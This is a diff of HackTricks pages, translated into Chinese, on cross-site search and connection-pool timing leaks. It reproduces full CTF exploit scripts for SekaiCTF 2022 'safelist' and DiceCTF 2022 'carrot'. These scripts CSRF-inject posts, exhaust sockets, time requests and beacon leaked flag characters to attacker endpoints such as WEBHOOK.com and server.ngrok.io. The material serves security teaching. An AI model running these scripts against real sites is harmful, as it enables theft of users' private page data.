-What this text will do is to make the bot access any text in the page that contains the text `SECR`. As that text is the secret and it's just **below the image**, the **image will only load if the guessed secret is correct**. So there you have your oracle to **exfiltrate the secret char by char**.
+一些利用此漏洞的代码示例：[https://gist.github.com/jorgectf/993d02bdadb5313f48cf1dc92a7af87e](https://gist.github.com/jorgectf/993d02bdadb5313f48cf1dc92a7af87e)
 
-Some code example to exploit this: [https://gist.github.com/jorgectf/993d02bdadb5313f48cf1dc92a7af87e](https://gist.github.com/jorgectf/993d02bdadb5313f48cf1dc92a7af87e)
+### 基于时间的图像懒加载
 
-### Image Lazy Loading Time Based
-
-If it's **not possible to load an external image** that could indicate the attacker that the image was loaded, another option would be to try to **guess the char several times and measure that**. If the image is loaded all the requests would take longer that if the image isn't loaded. This is what was used in the [**solution of this writeup**](https://blog.huli.tw/2022/10/08/en/sekaictf2022-safelist-and-connection/) **sumarized here:**
+如果 **无法加载外部图像**，这可能会向攻击者指示图像已加载，另一种选择是尝试 **多次猜测字符并测量**。如果图像加载，所有请求的时间将比图像未加载时更长。这就是在 [**此写作的解决方案**](https://blog.huli.tw/2022/10/08/en/sekaictf2022-safelist-and-connection/) **中总结的内容：**
 
 {{#ref}}
 event-loop-blocking-+-lazy-images.md
@@ -929,25 +917,23 @@ event-loop-blocking-+-lazy-images.md
 
 ### CSS ReDoS
 
-If `jQuery(location.hash)` is used, it's possible to find out via timing i**f some HTML content exists**, this is because if the selector `main[id='site-main']` doesn't match it doesn't need to check the rest of the **selectors**:
-
+如果使用 `jQuery(location.hash)`，可以通过时间判断 **某些 HTML 内容是否存在**，这是因为如果选择器 `main[id='site-main']` 不匹配，则不需要检查其余的 **选择器**：
 ```javascript
 $(
-  "*:has(*:has(*:has(*)) *:has(*:has(*:has(*))) *:has(*:has(*:has(*)))) main[id='site-main']"
+"*:has(*:has(*:has(*)) *:has(*:has(*:has(*))) *:has(*:has(*:has(*)))) main[id='site-main']"
 )
 ```
-
-### CSS Injection
+### CSS 注入
 
 {{#ref}}
 css-injection/
 {{#endref}}
 
-## Defenses
+## 防御
 
-There are mitigations recommended in [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) also in each section of the wiki [https://xsleaks.dev/](https://xsleaks.dev/). Take a look there for more information about how to protect against these techniques.
+在 [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) 中以及维基的每个部分 [https://xsleaks.dev/](https://xsleaks.dev/) 中推荐了一些缓解措施。请查看那里以获取有关如何防止这些技术的更多信息。
 
-## References
+## 参考
 
 - [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf)
 - [https://xsleaks.dev/](https://xsleaks.dev)
@@ -960,8 +946,7 @@ There are mitigations recommended in [https://xsinator.com/paper.pdf](https://xs
 <figure><img src="../../images/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
+使用 [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) 轻松构建和 **自动化工作流程**，由世界上 **最先进** 的社区工具提供支持。\
+今天就获取访问权限：
 
 {% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=xs-search" %}
-
diff --git a/src/pentesting-web/xs-search/connection-pool-by-destination-example.md b/src/pentesting-web/xs-search/connection-pool-by-destination-example.md
index a7fd44064..f0ae0eb9a 100644
--- a/src/pentesting-web/xs-search/connection-pool-by-destination-example.md
+++ b/src/pentesting-web/xs-search/connection-pool-by-destination-example.md
@@ -1,118 +1,115 @@
-# Connection Pool by Destination Example
+# 目标连接池示例
 
 {{#include ../../banners/hacktricks-training.md}}
 
-In [**this exploit**](https://gist.github.com/terjanq/0bc49a8ef52b0e896fca1ceb6ca6b00e#file-safelist-html), [**@terjanq**](https://twitter.com/terjanq) proposes yet another solution for the challenged mentioned in the following page:
+在 [**这个漏洞**](https://gist.github.com/terjanq/0bc49a8ef52b0e896fca1ceb6ca6b00e#file-safelist-html) 中， [**@terjanq**](https://twitter.com/terjanq) 提出了另一个解决方案，针对以下页面中提到的挑战：
 
 {{#ref}}
 connection-pool-by-destination-example.md
 {{#endref}}
 
-Let's see how this exploit work:
+让我们看看这个漏洞是如何工作的：
 
-- The attacker will inject a note with as many **`<img`** tags **loading** **`/js/purify.js`** as possible (more than 6 to block the origin).
-- Then, the attacker will **remove** the **note** with index 1.
-- Then, the attacker will \[make the **bot access the page** with the reminding note] and will send a **request** to **`victim.com/js/purify.js`** that he will **time**.&#x20;
-  - If the time is **bigger**, the **injection** was in the **note** left, if the time is **lower**, the **flag** was in there.
+- 攻击者将注入一个包含尽可能多的 **`<img`** 标签 **加载** **`/js/purify.js`** 的备注（超过6个以阻止来源）。
+- 然后，攻击者将 **删除** 索引为1的 **备注**。
+- 然后，攻击者将 \[使 **机器人访问页面** 以获取剩余的备注\] 并将发送一个 **请求** 到 **`victim.com/js/purify.js`**，他将 **计时**。&#x20;
+- 如果时间 **更长**，则 **注入** 在留下的 **备注** 中，如果时间 **更短**，则 **标志** 在那里。
 
 > [!NOTE]
-> Tbh, reading the script I missed some part where the **attacker makes the bot load the page to trigger the img tags**, I don't see anything like that in the code
-
+> 说实话，阅读脚本时我错过了一部分，攻击者让机器人加载页面以触发 img 标签，我在代码中没有看到类似的内容。
 ```html
 <html>
-  <head>
-    <script>
-      const SITE_URL = "https://safelist.ctf.sekai.team/"
-      const PING_URL = "https://myserver"
-      function timeScript() {
-        return new Promise((resolve) => {
-          var x = document.createElement("script")
-          x.src =
-            "https://safelist.ctf.sekai.team/js/purify.js?" + Math.random()
-          var start = Date.now()
-          x.onerror = () => {
-            console.log(`Time: ${Date.now() - start}`) //Time request
-            resolve(Date.now() - start)
-            x.remove()
-          }
-          document.body.appendChild(x)
-        })
-      }
+<head>
+<script>
+const SITE_URL = "https://safelist.ctf.sekai.team/"
+const PING_URL = "https://myserver"
+function timeScript() {
+return new Promise((resolve) => {
+var x = document.createElement("script")
+x.src =
+"https://safelist.ctf.sekai.team/js/purify.js?" + Math.random()
+var start = Date.now()
+x.onerror = () => {
+console.log(`Time: ${Date.now() - start}`) //Time request
+resolve(Date.now() - start)
+x.remove()
+}
+document.body.appendChild(x)
+})
+}
 
-      add_note = async (note) => {
-        let x = document.createElement("form")
-        x.action = SITE_URL + "create"
-        x.method = "POST"
-        x.target = "xxx"
+add_note = async (note) => {
+let x = document.createElement("form")
+x.action = SITE_URL + "create"
+x.method = "POST"
+x.target = "xxx"
 
-        let i = document.createElement("input")
-        i.type = "text"
-        i.name = "text"
-        i.value = note
-        x.appendChild(i)
-        document.body.appendChild(x)
-        x.submit()
-      }
+let i = document.createElement("input")
+i.type = "text"
+i.name = "text"
+i.value = note
+x.appendChild(i)
+document.body.appendChild(x)
+x.submit()
+}
 
-      remove_note = async (note_id) => {
-        let x = document.createElement("form")
-        x.action = SITE_URL + "remove"
-        x.method = "POST"
-        x.target = "_blank"
+remove_note = async (note_id) => {
+let x = document.createElement("form")
+x.action = SITE_URL + "remove"
+x.method = "POST"
+x.target = "_blank"
 
-        let i = document.createElement("input")
-        i.type = "text"
-        i.name = "index"
-        i.value = note_id
-        x.appendChild(i)
-        document.body.appendChild(x)
-        x.submit()
-      }
+let i = document.createElement("input")
+i.type = "text"
+i.name = "index"
+i.value = note_id
+x.appendChild(i)
+document.body.appendChild(x)
+x.submit()
+}
 
-      const sleep = (ms) => new Promise((resolve) => setTimeout(resolve, ms))
-      // }zyxwvutsrqponmlkjihgfedcba_
-      const alphabet = "zyxwvutsrqponmlkjihgfedcba_"
-      var prefix = "SEKAI{xsleakyay"
-      const TIMEOUT = 500
-      async function checkLetter(letter) {
-        // Chrome puts a limit of 6 concurrent request to the same origin. We are creating a lot of images pointing to purify.js
-        // Depending whether we found flag's letter it will either load the images or not.
-        // With timing, we can detect whether Chrome is processing purify.js or not from our site and hence leak the flag char by char.
-        const payload =
-          `${prefix}${letter}` +
-          Array.from(Array(78))
-            .map((e, i) => `<img/src=/js/purify.js?${i}>`)
-            .join("")
-        await add_note(payload)
-        await sleep(TIMEOUT)
-        await timeScript()
-        await remove_note(1) //Now, only the note with the flag or with the injection existsh
-        await sleep(TIMEOUT)
-        const time = await timeScript() //Find out how much a request to the same origin takes
-        navigator.sendBeacon(PING_URL, [letter, time])
-        if (time > 100) {
-          return 1
-        }
-        return 0
-      }
-      window.onload = async () => {
-        navigator.sendBeacon(PING_URL, "start")
-        // doesnt work because we are removing flag after success.
-        // while(1){
-        for (const letter of alphabet) {
-          if (await checkLetter(letter)) {
-            prefix += letter
-            navigator.sendBeacon(PING_URL, prefix)
-            break
-          }
-        }
-        // }
-      }
-    </script>
-  </head>
-  <body></body>
+const sleep = (ms) => new Promise((resolve) => setTimeout(resolve, ms))
+// }zyxwvutsrqponmlkjihgfedcba_
+const alphabet = "zyxwvutsrqponmlkjihgfedcba_"
+var prefix = "SEKAI{xsleakyay"
+const TIMEOUT = 500
+async function checkLetter(letter) {
+// Chrome puts a limit of 6 concurrent request to the same origin. We are creating a lot of images pointing to purify.js
+// Depending whether we found flag's letter it will either load the images or not.
+// With timing, we can detect whether Chrome is processing purify.js or not from our site and hence leak the flag char by char.
+const payload =
+`${prefix}${letter}` +
+Array.from(Array(78))
+.map((e, i) => `<img/src=/js/purify.js?${i}>`)
+.join("")
+await add_note(payload)
+await sleep(TIMEOUT)
+await timeScript()
+await remove_note(1) //Now, only the note with the flag or with the injection existsh
+await sleep(TIMEOUT)
+const time = await timeScript() //Find out how much a request to the same origin takes
+navigator.sendBeacon(PING_URL, [letter, time])
+if (time > 100) {
+return 1
+}
+return 0
+}
+window.onload = async () => {
+navigator.sendBeacon(PING_URL, "start")
+// doesnt work because we are removing flag after success.
+// while(1){
+for (const letter of alphabet) {
+if (await checkLetter(letter)) {
+prefix += letter
+navigator.sendBeacon(PING_URL, prefix)
+break
+}
+}
+// }
+}
+</script>
+</head>
+<body></body>
 </html>
 ```
-
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/xs-search/connection-pool-example.md b/src/pentesting-web/xs-search/connection-pool-example.md
index f9a6deec4..a6bdde000 100644
--- a/src/pentesting-web/xs-search/connection-pool-example.md
+++ b/src/pentesting-web/xs-search/connection-pool-example.md
@@ -1,338 +1,333 @@
-# Connection Pool Examples
+# 连接池示例
 
 {{#include ../../banners/hacktricks-training.md}}
 
 ## Sekaictf2022 - safelist
 
-In the [**Sekaictf2022 - safelist**](https://github.com/project-sekai-ctf/sekaictf-2022/tree/main/web/safelist/solution) challenge, [**@Strellic\_**](https://twitter.com/Strellic_) gives an example of how to use a **variation** of the **Connection Pool** technique to perform a **XS-Leak**.
+在[**Sekaictf2022 - safelist**](https://github.com/project-sekai-ctf/sekaictf-2022/tree/main/web/safelist/solution)挑战中，[**@Strellic\_**](https://twitter.com/Strellic_)给出了如何使用**连接池**技术的**变体**来执行**XS-Leak**的示例。
 
-In this challenge, the goal is to exfiltrate a flag that will appear in the bots web session inside a post. These are the assets the attacker has:
+在这个挑战中，目标是从机器人的网络会话中提取一个将在帖子中出现的标志。这是攻击者拥有的资产：
 
-- The **bot** will **visit** a **URL** given by the attacker
-- The attacker can **inject HTML** in the page (but no JS, dompurify is used) abusing a **CSRF** making the **bot create a post** with that HTML.
-- The attacker can abuse a CSRF to make the **bot** **delete** the **first** **post** inside the web.
-- Because the **posts** are ordered **alphabetically**, when the **first post is deleted**, if the **HTML** content of the attacker is **loaded** means that it was **alphabetically before the flag**.
+- **机器人**将**访问**攻击者给定的**URL**
+- 攻击者可以在页面中**注入HTML**（但不允许JS，使用了dompurify）利用**CSRF**使**机器人创建一个带有该HTML的帖子**。
+- 攻击者可以利用CSRF使**机器人****删除**网页中的**第一个**帖子。
+- 由于**帖子**是按**字母顺序**排列的，当**第一个帖子被删除**时，如果攻击者的**HTML**内容被**加载**，则意味着它在**标志之前的字母顺序**。
 
-Therefore, to steal the flag, the solution proposed by @Strellyc\_ is to, **for each char to test** make the bot:
+因此，为了窃取标志，@Strellyc\_提出的解决方案是，**对于每个要测试的字符**，让机器人：
 
-- Create a **new post** that **starts** with the known part of the **flag** and several **img** **loads**.
-- **Delete** the **post** in position **0**.
-- Block 255 sockets.
-- Load the page with the posts
-- Perform 5 random requests to a site (example.com in this case) and measure the time this takes.
+- 创建一个**新帖子**，该帖子**以**已知的**标志**部分开头，并加载多个**img**。
+- **删除**位置为**0**的**帖子**。
+- 阻塞255个套接字。
+- 加载带有帖子页面。
+- 对一个网站（在这种情况下为example.com）执行5个随机请求，并测量所需时间。
 
 > [!WARNING]
-> If the **deleted** post was the **flag**, this means that all the **images** **injected** in the HTML are going to be **fighting** with the **5 random requests** for that **unblocked** socket. Which means that the time measured is going to be bigger than the other scenario.
+> 如果**删除**的帖子是**标志**，这意味着所有**注入**在HTML中的**图像**将与**5个随机请求**争夺那个**未阻塞**的套接字。这意味着测量的时间将比其他情况更长。
 >
-> If the **deleted** post was the **HTML**, the **5 random requests** will be **faster** because they don't need to fight for that socket with the HTML injected.
+> 如果**删除**的帖子是**HTML**，则**5个随机请求**将会**更快**，因为它们不需要与注入的HTML争夺那个套接字。
 
-### Exploit 1
-
-This is the exploit code, taken from [https://github.com/project-sekai-ctf/sekaictf-2022/blob/main/web/safelist/solution/solve.html](https://github.com/project-sekai-ctf/sekaictf-2022/blob/main/web/safelist/solution/solve.html):
+### 利用1
 
+这是利用代码，取自[https://github.com/project-sekai-ctf/sekaictf-2022/blob/main/web/safelist/solution/solve.html](https://github.com/project-sekai-ctf/sekaictf-2022/blob/main/web/safelist/solution/solve.html)：
 ```html
 <!-- Form to inject HTML code in the bots page -->
 <form
-  method="POST"
-  action="https://safelist.ctf.sekai.team/create"
-  id="create"
-  target="_blank">
-  <input type="text" name="text" />
-  <input type="submit" />
+method="POST"
+action="https://safelist.ctf.sekai.team/create"
+id="create"
+target="_blank">
+<input type="text" name="text" />
+<input type="submit" />
 </form>
 
 <!-- Form to delete the first entry -->
 <form
-  method="POST"
-  action="https://safelist.ctf.sekai.team/remove"
-  id="remove"
-  target="_blank">
-  <input type="text" name="index" value="0" />
-  <input type="submit" />
+method="POST"
+action="https://safelist.ctf.sekai.team/remove"
+id="remove"
+target="_blank">
+<input type="text" name="index" value="0" />
+<input type="submit" />
 </form>
 
 <script>
-  // Attacker listening
-  const WEBHOOK = "https://WEBHOOK.com/"
-  // Send data to attacker
-  const log = (id, data) => {
-    let payload = JSON.stringify({ known, alphabet, data })
-    console.log(id, payload)
-    navigator.sendBeacon(WEBHOOK + "?" + id, payload)
-  }
+// Attacker listening
+const WEBHOOK = "https://WEBHOOK.com/"
+// Send data to attacker
+const log = (id, data) => {
+let payload = JSON.stringify({ known, alphabet, data })
+console.log(id, payload)
+navigator.sendBeacon(WEBHOOK + "?" + id, payload)
+}
 
-  // Similar to JQuery
-  const $ = document.querySelector.bind(document)
+// Similar to JQuery
+const $ = document.querySelector.bind(document)
 
-  // Known part of the flag
-  const known = "SEKAI{"
-  let alphabet = "_abcdefghijklmnopqrstuvwxyz}"
+// Known part of the flag
+const known = "SEKAI{"
+let alphabet = "_abcdefghijklmnopqrstuvwxyz}"
 
-  // Reduce the alphabet using a hash (#) in the URL
-  if (location.hash) {
-    alphabet = alphabet.slice(alphabet.indexOf(location.hash.slice(1)))
-  }
+// Reduce the alphabet using a hash (#) in the URL
+if (location.hash) {
+alphabet = alphabet.slice(alphabet.indexOf(location.hash.slice(1)))
+}
 
-  // Funtion to leak chars
-  const leak = async (c) => {
-    // Prepare post with known flag and the new char
-    let payload = `${known + c}`
-    // Inject as many <img as possible
-    // you need to respect the CSP and create URLs that are different
-    for (let i = 0; payload.length < 2048; i++) {
-      payload += `<img src=js/purify.js?${i.toString(36)}>`
-    }
+// Funtion to leak chars
+const leak = async (c) => {
+// Prepare post with known flag and the new char
+let payload = `${known + c}`
+// Inject as many <img as possible
+// you need to respect the CSP and create URLs that are different
+for (let i = 0; payload.length < 2048; i++) {
+payload += `<img src=js/purify.js?${i.toString(36)}>`
+}
 
-    // Inject HTML
-    $("#create input[type=text]").value = payload
-    $("#create").submit()
-    await new Promise((r) => setTimeout(r, 1000))
+// Inject HTML
+$("#create input[type=text]").value = payload
+$("#create").submit()
+await new Promise((r) => setTimeout(r, 1000))
 
-    // Remove post with index 0
-    $("#remove").submit()
-    await new Promise((r) => setTimeout(r, 500))
+// Remove post with index 0
+$("#remove").submit()
+await new Promise((r) => setTimeout(r, 500))
 
-    let deltas = []
+let deltas = []
 
-    // Try each char 3 times
-    for (let i = 0; i < 3; i++) {
-      const SOCKET_LIMIT = 255
-      // you will need a custom server that works like num.sleepserver.com/sleep/delay
-      // needed to freeze the blocked sockets, and they have to all be on different origins
-      // Check https://www.npmjs.com/package/sleep-server using subdomains DNS wildcard
-      const SLEEP_SERVER = (i) => `http://${i}.sleepserver.com/sleep/60`
+// Try each char 3 times
+for (let i = 0; i < 3; i++) {
+const SOCKET_LIMIT = 255
+// you will need a custom server that works like num.sleepserver.com/sleep/delay
+// needed to freeze the blocked sockets, and they have to all be on different origins
+// Check https://www.npmjs.com/package/sleep-server using subdomains DNS wildcard
+const SLEEP_SERVER = (i) => `http://${i}.sleepserver.com/sleep/60`
 
-      const block = async (i, controller) => {
-        try {
-          return fetch(SLEEP_SERVER(i), {
-            mode: "no-cors",
-            signal: controller.signal,
-          })
-        } catch (err) {}
-      }
+const block = async (i, controller) => {
+try {
+return fetch(SLEEP_SERVER(i), {
+mode: "no-cors",
+signal: controller.signal,
+})
+} catch (err) {}
+}
 
-      // block SOCKET_LIMIT sockets
-      const controller = new AbortController()
-      for (let i = 0; i < SOCKET_LIMIT; i++) {
-        block(i, controller)
-      }
+// block SOCKET_LIMIT sockets
+const controller = new AbortController()
+for (let i = 0; i < SOCKET_LIMIT; i++) {
+block(i, controller)
+}
 
-      // Make the bot access the page with the posts
-      window.open(
-        "https://safelist.ctf.sekai.team/?" +
-          Math.random().toString(36).slice(2),
-        "pwn"
-      )
-      await new Promise((r) => setTimeout(r, 500))
+// Make the bot access the page with the posts
+window.open(
+"https://safelist.ctf.sekai.team/?" +
+Math.random().toString(36).slice(2),
+"pwn"
+)
+await new Promise((r) => setTimeout(r, 500))
 
-      // start meassuring time to perform 5 requests
-      let start = performance.now()
-      await Promise.all([
-        fetch("https://example.com", { mode: "no-cors" }),
-        fetch("https://example.com", { mode: "no-cors" }),
-        fetch("https://example.com", { mode: "no-cors" }),
-        fetch("https://example.com", { mode: "no-cors" }),
-        fetch("https://example.com", { mode: "no-cors" }),
-      ])
-      let delta = performance.now() - start
-      document.title = delta
-      controller.abort()
+// start meassuring time to perform 5 requests
+let start = performance.now()
+await Promise.all([
+fetch("https://example.com", { mode: "no-cors" }),
+fetch("https://example.com", { mode: "no-cors" }),
+fetch("https://example.com", { mode: "no-cors" }),
+fetch("https://example.com", { mode: "no-cors" }),
+fetch("https://example.com", { mode: "no-cors" }),
+])
+let delta = performance.now() - start
+document.title = delta
+controller.abort()
 
-      log("test_" + c + "_" + i, delta)
+log("test_" + c + "_" + i, delta)
 
-      // Save time needed
-      deltas.push(delta)
-    }
-    return deltas
-  }
+// Save time needed
+deltas.push(delta)
+}
+return deltas
+}
 
-  // Check each char
-  const pwn = async () => {
-    // Try to leak each character
-    for (let i = 0; i < alphabet.length; i++) {
-      //Check the indicated char
-      let deltas = await leak(alphabet[i])
+// Check each char
+const pwn = async () => {
+// Try to leak each character
+for (let i = 0; i < alphabet.length; i++) {
+//Check the indicated char
+let deltas = await leak(alphabet[i])
 
-      // Calculate mean time from requests to example.com
-      let avg = deltas.reduce((a, v) => a + v, 0) / deltas.length
+// Calculate mean time from requests to example.com
+let avg = deltas.reduce((a, v) => a + v, 0) / deltas.length
 
-      // If greater than 250, the HTML code was injected (flag in index 0)
-      if (avg > 250) {
-        log("tests_pos_" + alphabet[i], deltas)
-      }
-      // Flag in the page
-      else {
-        log("tests_neg_" + alphabet[i], deltas)
-      }
-    }
-  }
+// If greater than 250, the HTML code was injected (flag in index 0)
+if (avg > 250) {
+log("tests_pos_" + alphabet[i], deltas)
+}
+// Flag in the page
+else {
+log("tests_neg_" + alphabet[i], deltas)
+}
+}
+}
 
-  window.onload = async () => {
-    pwn()
-  }
+window.onload = async () => {
+pwn()
+}
 </script>
 ```
-
 ### Exploit 2
 
-Same tactic but different code from [https://blog.huli.tw/2022/10/05/en/sekaictf2022-safelist-xsleak/](https://blog.huli.tw/2022/10/05/en/sekaictf2022-safelist-xsleak/)
-
+相同的策略，但代码不同来自 [https://blog.huli.tw/2022/10/05/en/sekaictf2022-safelist-xsleak/](https://blog.huli.tw/2022/10/05/en/sekaictf2022-safelist-xsleak/)
 ```html
 <!DOCTYPE html>
 <html>
-  <!--
-  The basic idea is to create a post with a lot of images which send request to "/" to block server-side nodejs main thread.
-  If images are loading, the request to "/" is slower, otherwise faster.
-  By using a well-crafted height, we can let note with "A" load image but note with "Z" not load.
-  We can use fetch to measure the request time.
+<!--
+The basic idea is to create a post with a lot of images which send request to "/" to block server-side nodejs main thread.
+If images are loading, the request to "/" is slower, otherwise faster.
+By using a well-crafted height, we can let note with "A" load image but note with "Z" not load.
+We can use fetch to measure the request time.
 -->
-  <body>
-    <button onclick="run()">start</button>
-    <form
-      id="f"
-      action="http://localhost:1234/create"
-      method="POST"
-      target="_blank">
-      <input id="inp" name="text" value="" />
-    </form>
+<body>
+<button onclick="run()">start</button>
+<form
+id="f"
+action="http://localhost:1234/create"
+method="POST"
+target="_blank">
+<input id="inp" name="text" value="" />
+</form>
 
-    <form
-      id="f2"
-      action="http://localhost:1234/remove"
-      method="POST"
-      target="_blank">
-      <input id="inp2" name="index" value="" />
-    </form>
-    <script>
-      let flag = "SEKAI{"
-      const TARGET = "https://safelist.ctf.sekai.team"
-      f.action = TARGET + "/create"
-      f2.action = TARGET + "/remove"
+<form
+id="f2"
+action="http://localhost:1234/remove"
+method="POST"
+target="_blank">
+<input id="inp2" name="index" value="" />
+</form>
+<script>
+let flag = "SEKAI{"
+const TARGET = "https://safelist.ctf.sekai.team"
+f.action = TARGET + "/create"
+f2.action = TARGET + "/remove"
 
-      const sleep = (ms) => new Promise((r) => setTimeout(r, ms))
-      const send = (data) => fetch("http://server.ngrok.io?d=" + data)
-      const charset = "abcdefghijklmnopqrstuvwxyz".split("")
+const sleep = (ms) => new Promise((r) => setTimeout(r, ms))
+const send = (data) => fetch("http://server.ngrok.io?d=" + data)
+const charset = "abcdefghijklmnopqrstuvwxyz".split("")
 
-      // start exploit
-      let count = 0
-      setTimeout(async () => {
-        let L = 0
-        let R = charset.length - 1
-        while (R - L > 3) {
-          let M = Math.floor((L + R) / 2)
-          let c = charset[M]
-          send("try_" + flag + c)
-          const found = await testChar(flag + c)
-          if (found) {
-            L = M
-          } else {
-            R = M - 1
-          }
-        }
+// start exploit
+let count = 0
+setTimeout(async () => {
+let L = 0
+let R = charset.length - 1
+while (R - L > 3) {
+let M = Math.floor((L + R) / 2)
+let c = charset[M]
+send("try_" + flag + c)
+const found = await testChar(flag + c)
+if (found) {
+L = M
+} else {
+R = M - 1
+}
+}
 
-        // fallback to linear since I am not familiar with binary search lol
-        for (let i = R; i >= L; i--) {
-          let c = charset[i]
-          send("try_" + flag + c)
-          const found = await testChar(flag + c)
-          if (found) {
-            send("found: " + flag + c)
-            flag += c
-            break
-          }
-        }
-      }, 0)
+// fallback to linear since I am not familiar with binary search lol
+for (let i = R; i >= L; i--) {
+let c = charset[i]
+send("try_" + flag + c)
+const found = await testChar(flag + c)
+if (found) {
+send("found: " + flag + c)
+flag += c
+break
+}
+}
+}, 0)
 
-      async function testChar(str) {
-        return new Promise((resolve) => {
-          /*
-            For 3350, you need to test it on your local to get this number.
-            The basic idea is, if your post starts with "Z", the image should not be loaded because it's under lazy loading threshold
-            If starts with "A", the image should be loaded because it's in the threshold.
-          */
-          inp.value =
-            str +
-            '<br><canvas height="3350px"></canvas><br>' +
-            Array.from({ length: 20 })
-              .map((_, i) => `<img loading=lazy src=/?${i}>`)
-              .join("")
-          f.submit()
+async function testChar(str) {
+return new Promise((resolve) => {
+/*
+For 3350, you need to test it on your local to get this number.
+The basic idea is, if your post starts with "Z", the image should not be loaded because it's under lazy loading threshold
+If starts with "A", the image should be loaded because it's in the threshold.
+*/
+inp.value =
+str +
+'<br><canvas height="3350px"></canvas><br>' +
+Array.from({ length: 20 })
+.map((_, i) => `<img loading=lazy src=/?${i}>`)
+.join("")
+f.submit()
 
-          setTimeout(() => {
-            run(str, resolve)
-          }, 500)
-        })
-      }
+setTimeout(() => {
+run(str, resolve)
+}, 500)
+})
+}
 
-      async function run(str, resolve) {
-        // if the request is not enough, we can send more by opening more window
-        for (let i = 1; i <= 5; i++) {
-          window.open(TARGET)
-        }
+async function run(str, resolve) {
+// if the request is not enough, we can send more by opening more window
+for (let i = 1; i <= 5; i++) {
+window.open(TARGET)
+}
 
-        let t = 0
-        const round = 30
-        setTimeout(async () => {
-          for (let i = 0; i < round; i++) {
-            let s = performance.now()
-            await fetch(TARGET + "/?test", {
-              mode: "no-cors",
-            }).catch((err) => 1)
-            let end = performance.now()
-            t += end - s
-            console.log(end - s)
-          }
-          const avg = t / round
-          send(str + "," + t + "," + "avg:" + avg)
+let t = 0
+const round = 30
+setTimeout(async () => {
+for (let i = 0; i < round; i++) {
+let s = performance.now()
+await fetch(TARGET + "/?test", {
+mode: "no-cors",
+}).catch((err) => 1)
+let end = performance.now()
+t += end - s
+console.log(end - s)
+}
+const avg = t / round
+send(str + "," + t + "," + "avg:" + avg)
 
-          /*
-          I get this threshold(1000ms) by trying multiple times on remote admin bot
-          for example, A takes 1500ms, Z takes 700ms, so I choose 1000 ms as a threshold
-        */
-          const isFound = t >= 1000
-          if (isFound) {
-            inp2.value = "0"
-          } else {
-            inp2.value = "1"
-          }
+/*
+I get this threshold(1000ms) by trying multiple times on remote admin bot
+for example, A takes 1500ms, Z takes 700ms, so I choose 1000 ms as a threshold
+*/
+const isFound = t >= 1000
+if (isFound) {
+inp2.value = "0"
+} else {
+inp2.value = "1"
+}
 
-          // remember to delete the post to not break our leak oracle
-          f2.submit()
-          setTimeout(() => {
-            resolve(isFound)
-          }, 200)
-        }, 200)
-      }
-    </script>
-  </body>
+// remember to delete the post to not break our leak oracle
+f2.submit()
+setTimeout(() => {
+resolve(isFound)
+}, 200)
+}, 200)
+}
+</script>
+</body>
 </html>
 ```
-
 ## DiceCTF 2022 - carrot
 
-In this case the first step of the exploit was to abuse a CSRF to modify the page where the flag is contained so it has **much more content** (and therefore loading it takes more time), and then **abuse the connection pool to measure the time it takes to access the page** that could be potentially having the flag.
+在这个案例中，利用漏洞的第一步是滥用 CSRF 来修改包含标志的页面，使其具有 **更多内容**（因此加载时间更长），然后 **滥用连接池来测量访问可能包含标志的页面所需的时间**。
 
-In the exploit you can see:
-
-- Abuse CSRF
-- Occupy all the sockets but 1
-- Calibrate the response
-- Start bruteforcing by accessing the potential page with the flag
-  - The potential page will be accessed and immediately an attackers controlled URL will also be accessed to check how much time both requests take.
+在漏洞中你可以看到：
 
+- 滥用 CSRF
+- 占用所有套接字但保留 1 个
+- 校准响应
+- 通过访问可能包含标志的页面开始暴力破解
+- 将访问潜在页面，并立即访问攻击者控制的 URL，以检查两个请求所需的时间。
 ```html
 <h1>DiceCTF 2022 web/carrot</h1>
 
 <p>
-  Step 1: CSRF the admin user, to set a super long title for the flag note (LAX
-  + POST form only possible for 2 minutes after cookies is created)
+Step 1: CSRF the admin user, to set a super long title for the flag note (LAX
++ POST form only possible for 2 minutes after cookies is created)
 </p>
 <button onclick="csrf()">do csrf</button>
 <p>
-  Step 2: XS-Search with
-  <a href="https://xsleaks.dev/docs/attacks/timing-attacks/connection-pool/"
-    >connection-pool timing leak</a
-  >, we have to use window.open (LAX cookie)
+Step 2: XS-Search with
+<a href="https://xsleaks.dev/docs/attacks/timing-attacks/connection-pool/"
+>connection-pool timing leak</a
+>, we have to use window.open (LAX cookie)
 </p>
 
 <button onclick="popunder()">open popup</button>
@@ -344,186 +339,184 @@ In the exploit you can see:
 <h2 id="output"></h2>
 <br />
 <form id="x" action="" method="POST" style="display:none;">
-  <input type="text" name="title" placeholder="title" />
-  <br /><br />
-  <input type="number" name="priority" placeholder="priority" value="9999" />
-  <br /><br />
-  <textarea name="content" placeholder="content" rows="5" cols="20"></textarea>
-  <br /><br />
-  <input type="submit" value="submit" />
+<input type="text" name="title" placeholder="title" />
+<br /><br />
+<input type="number" name="priority" placeholder="priority" value="9999" />
+<br /><br />
+<textarea name="content" placeholder="content" rows="5" cols="20"></textarea>
+<br /><br />
+<input type="submit" value="submit" />
 </form>
 
 <script>
-  // this is send is used as logging
-  LOG = "Starting"
-  // 255 in normal chrome, 99 in headless
-  SOCKETLIMIT = 255
-  // default
-  TIMELIMIT = 800
-  INSTANCE = ""
-  MYSERVER = `example.com`
+// this is send is used as logging
+LOG = "Starting"
+// 255 in normal chrome, 99 in headless
+SOCKETLIMIT = 255
+// default
+TIMELIMIT = 800
+INSTANCE = ""
+MYSERVER = `example.com`
 
-  const sleep = (ms) => {
-    return new Promise((resolve) => {
-      setTimeout(resolve, ms)
-    })
-  }
+const sleep = (ms) => {
+return new Promise((resolve) => {
+setTimeout(resolve, ms)
+})
+}
 
-  const time_fetch = async () => {
-    let test_server_url = `https://${MYSERVER}/?${LOG}`
-    let start = window.performance.now()
-    try {
-      await fetch(test_server_url, {
-        mode: "no-cors",
-      })
-    } catch (e) {
-      console.log(e)
-    }
-    let end = window.performance.now()
-    return end - start
-  }
